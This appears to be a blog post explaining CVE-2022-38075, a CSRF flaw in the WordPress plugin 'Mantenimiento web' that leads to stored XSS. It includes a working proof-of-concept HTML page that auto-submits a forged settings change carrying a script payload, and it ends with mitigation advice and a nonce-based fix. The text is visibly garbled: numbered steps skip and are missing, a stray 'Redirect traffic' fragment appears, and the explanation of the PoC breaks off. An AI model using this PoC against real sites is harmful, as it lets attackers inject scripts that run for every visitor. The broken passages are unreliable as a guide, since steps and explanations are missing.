Table of Contents
Introduction
WordPress is the most popular Content Management System (CMS) in the world. Its plugin ecosystem brings great flexibility—but also opens doors to security risks. One such risk is CVE-2022-38075, found in a maintenance mode plugin called "Mantenimiento web" (mantenimiento-web), version .13 and earlier. This bug allows attackers to use CSRF (Cross-Site Request Forgery) to inject persistent malicious scripts (Stored XSS) into vulnerable WordPress sites.
This post breaks down what CVE-2022-38075 is, how it can be abused, and what you can do about it.
What is CVE-2022-38075?
CVE-2022-38075 refers to a vulnerability in the "Mantenimiento web" plugin for WordPress. This plugin helps site admins put their sites into maintenance mode. But up to version .13, it contained an insecure admin page that lacked CSRF protection and did not properly sanitize user input.
Leads to stored (persistent) XSS: Scripts are stored in WordPress and run for all visitors.
The official CVE record:
> NVD - CVE-2022-38075
How Does the Vulnerability Work?
To exploit this bug, an attacker must get a logged-in administrator to visit a website they control. This malicious website silently sends a request (with crafted form data) to the vulnerable plugin’s settings page, changing its content to include a malicious script.
Because the plugin blindly accepts the POST data and lacks CSRF checks, the update goes through, and the malicious code is saved. When site visitors hit the maintenance page, the script executes in their browsers—effectively a stored XSS.
Visit attacker site: While still logged in, admin visits a malicious web page.
3. Browser sends forged POST: The attacking page auto-submits a POST request (cross-site) to the vulnerable plugin’s settings.
Malicious script stored: The plugin saves the malicious payload.
6. Script runs on site: Anyone accessing the affected maintenance page loads and runs the attacker’s script.
Here’s a minimal proof-of-concept (PoC) exploit page, crafted by an attacker
<!-- Save this as attacker.html and send it to a WordPress admin -->
<html>
<body>
<form id="csrf_poc" action="https://target-wp-site.com/wp-admin/options-general.php?page=mantenimiento_web"; method="POST">
<input type="hidden" name="maintenance_message" value='<script>alert("pwned by CVE-2022-38075")</script>' />
<input type="hidden" name="other_settings_field" value="...">
<!-- Add more fields as necessary -->
</form>
<script>
document.getElementById('csrf_poc').submit();
</script>
</body>
</html>
Here’s what’s going on
- When the victim (admin) visits this page, the browser silently submits the form to the plugin configuration URL.
Redirect traffic
Fixes and Mitigation
1. Update the plugin:
Check for updates or switch to an actively maintained maintenance plugin that uses secure coding practices. As of this writing, there is no sign of an official patch. Plugin page (archived).
2. Remove the plugin:
Disable and delete the plugin if you are running v.13 or earlier.
3. Harden admin accounts:
Don’t browse unknown websites while logged in as an admin.
- Use WordPress Application Firewalls (WAF) to help block unauthorized requests.
4. Code review tips:
- All forms updating settings must include a cryptographically strong CSRF token, validated server-side.
Developer Fix Example
// At the top of the settings page processing code
if (!isset($_POST['mantenimiento_web_nonce']) ||
!wp_verify_nonce($_POST['mantenimiento_web_nonce'], 'mantenimiento_web_update')) {
die('CSRF check failed');
}
// On the settings form (inside <form>)
wp_nonce_field('mantenimiento_web_update', 'mantenimiento_web_nonce');
References
- CVE-2022-38075 - NVD Details
- WP Plugins Directory (archived)
- WordFence Blog: CSRF and XSS Attacks
- OWASP: CSRF Attack Guide
- OWASP: XSS Prevention Cheat Sheet
Final Thoughts
CVE-2022-38075 is a good reminder: even "simple" plugins can become huge security risks if they ignore CSRF and input sanitization. Always keep plugins updated, and review the ones you use—especially those that decide what your site looks like.
If you use "Mantenimiento web" plugin v.13 or below, disable it immediately until the issue is resolved.
Timeline
Published on: 11/18/2022 19:15:00 UTC
Last modified on: 11/21/2022 01:46:00 UTC